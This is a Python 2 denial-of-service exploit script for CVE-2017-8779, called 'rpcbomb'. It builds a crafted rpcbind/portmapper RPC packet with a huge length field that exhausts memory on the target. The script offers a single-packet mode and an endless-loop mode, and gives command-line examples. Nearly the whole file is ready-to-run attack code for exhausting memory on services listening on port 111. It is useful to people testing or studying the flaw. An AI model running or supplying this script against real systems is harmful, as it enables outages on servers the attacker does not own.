Exploits_DoS/CVE-2017-8779_rpcbomb.py

#!/usr/bin/env python2
#
# CVE-2017-8779 aka rpcbomb.py
# python implementation of rpcbomb
# the bug author's page is here: https://guidovranken.wordpress.com/
# original ruby exploit: https://www.exploit-db.com/exploits/41974
# CVE https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8779
#
# this one comes with a loop mode and a single-packet mode, to consume memory over time and not just once
#
# I was not able to observe any sort of crash or the like
# on the testsystem the cpu consumption went up to 50% (1 CPU)
# memory allocation was done
# syslogd reportedly mentions out of memory from rpcbind
# depending on the environment and service offered probably interesting
#
# one packet
# ./rpcbomb.py -t 127.0.0.1
#
# define memory allocation
# ./rpcbomb.py -t 127.0.0.1 -l 1024
#
# endless mode
# ./rpcbomb.py -t 127.0.0.1 -e
#
# 2nd June 2017
# by dash
import os
import sys
import struct
import socket
import argparse
def run(args):
    """Send the crafted rpcbind request to args.ip:args.port.

    args is the argparse namespace built in main(): ip (-t), port (-p),
    malloc (-l, the value written into the last field of the packet) and
    endless (-e, keep sending instead of stopping after one packet).
    One packet is sent per iteration and a '.' is printed after each
    reply. Python 2 print statements are used throughout.
    """
    ip = args.ip
    paylen = args.malloc  # -l/--len value; the file header calls this "memory to allocate"
    port = args.port
    # ONC RPC call header; every field is a big-endian 32-bit integer ('!I').
    pkt = struct.pack('!I',0) # xid
    pkt += struct.pack('!I',0) # message type CALL
    pkt += struct.pack('!I',2) # RPC version 2
    pkt += struct.pack('!I',100000) # Program (rpcbind / portmapper)
    pkt += struct.pack('!I',4) # Program version
    pkt += struct.pack('!I',9) # Procedure
    pkt += struct.pack('!I',0) # Creds AUTH_NULL
    pkt += struct.pack('!I',0) # Creds len 0
    pkt += struct.pack('!I',0) # Creds AUTH_NULL (presumably the verifier field of the call body)
    pkt += struct.pack('!I',0) # Creds len 0
    pkt += struct.pack('!I',0) # Program: 0
    pkt += struct.pack('!I',0) # Ver
    pkt += struct.pack('!I',4) # Proc
    pkt += struct.pack('!I',4) # Argument length
    pkt += struct.pack('!I',paylen) # Payloadlen: the -l value (main() defaults it to 4294967295)
    while 1:
        # A fresh UDP socket is opened on every iteration and never closed;
        # recvfrom() has no timeout, so the loop stalls if the target does
        # not answer. The reply contents (data, addr) are not inspected.
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        s.sendto(pkt, (ip, port))
        data, addr = s.recvfrom(16384)
        print '.',
        sys.stdout.flush()
        if not args.endless:
            break
    print
    print 'Done'
def main():
    """Parse the command line described in the file header and call run().

    Options: -t/--target (required host, stored as ip), -p/--port
    (default 111), -l/--len (length value, stored as malloc, default
    4294967295) and -e/--endless (flag, stored as endless).
    """
    parser = argparse.ArgumentParser(
        prog='portbind memory exhaustion exploit',
        description='rpcbomb - python exploit by dash',
    )
    parser.add_argument('-t', '--target', dest='ip', required=True,
                        help='host to send exploit')
    parser.add_argument('-p', '--port', dest='port', type=int, default=111,
                        help='port exploit to send to')
    parser.add_argument('-l', '--len', dest='malloc', type=int,
                        default=4294967295, help='memory to allocate')
    parser.add_argument('-e', '--endless', dest='endless', action='store_true',
                        help='send packets constantly')
    run(parser.parse_args())
# Script entry point: parse the command line and run.
if __name__ == "__main__":
    main()